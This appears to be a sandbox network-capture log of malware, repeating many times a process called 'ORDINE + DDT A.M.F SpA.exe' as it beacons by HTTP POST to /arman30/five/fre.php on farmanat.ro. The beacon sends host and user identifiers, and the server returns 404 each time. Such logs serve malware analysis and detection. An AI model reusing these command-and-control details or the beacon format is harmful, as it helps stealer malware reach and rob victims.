Nov 25, 2021 10:52:34.702326059 CET	7039	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:34.735831976 CET	7040	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:34.792382956 CET	7040	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
522	192.168.11.20	50366	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:35.210581064 CET	7041	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:35.244793892 CET	7041	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:35.300080061 CET	7041	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
523	192.168.11.20	50367	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:35.688599110 CET	7042	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:35.722184896 CET	7042	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:35.772387981 CET	7043	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
524	192.168.11.20	50368	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:36.166352034 CET	7043	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:36.200638056 CET	7044	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:36.252363920 CET	7044	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
525	192.168.11.20	50369	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:36.667413950 CET	7045	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:36.700978041 CET	7045	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:36.750554085 CET	7045	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
526	192.168.11.20	50370	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:37.177629948 CET	7046	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:37.211122990 CET	7046	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:37.260508060 CET	7047	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
527	192.168.11.20	50371	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:37.684361935 CET	7047	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:37.718498945 CET	7048	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:37.768307924 CET	7048	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
528	192.168.11.20	50372	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:38.201109886 CET	7049	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:38.235380888 CET	7049	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:38.293354034 CET	7049	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
529	192.168.11.20	50373	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:38.676992893 CET	7050	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:38.711014986 CET	7050	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:38.760119915 CET	7051	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.11.20	49889	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:35.542264938 CET	6383	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:35.575865030 CET	6383	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:35.624941111 CET	6384	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
530	192.168.11.20	50374	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:39.142414093 CET	7051	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:39.176614046 CET	7052	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:39.230204105 CET	7052	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
531	192.168.11.20	50375	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:39.619721889 CET	7053	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:39.653296947 CET	7053	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:39.732794046 CET	7053	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
532	192.168.11.20	50376	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:40.167311907 CET	7054	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:40.200833082 CET	7054	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:40.250220060 CET	7055	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
533	192.168.11.20	50377	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:40.668286085 CET	7055	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:40.702511072 CET	7056	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:40.755194902 CET	7056	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
534	192.168.11.20	50378	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:41.168891907 CET	7057	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:41.203107119 CET	7057	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:41.253366947 CET	7057	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
535	192.168.11.20	50379	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:41.613993883 CET	7058	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:41.647304058 CET	7058	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:41.702423096 CET	7059	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
536	192.168.11.20	50380	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:42.127399921 CET	7059	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:42.161623955 CET	7060	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:42.215949059 CET	7060	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
537	192.168.11.20	50381	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:42.627468109 CET	7061	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:42.661046028 CET	7061	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:42.715389967 CET	7061	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
538	192.168.11.20	50382	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:43.136375904 CET	7062	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:43.170875072 CET	7062	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:43.228360891 CET	7063	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
539	192.168.11.20	50383	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:43.624345064 CET	7063	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:43.658546925 CET	7064	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:43.713879108 CET	7064	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.11.20	49890	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:36.204633951 CET	6384	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:36.238786936 CET	6385	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
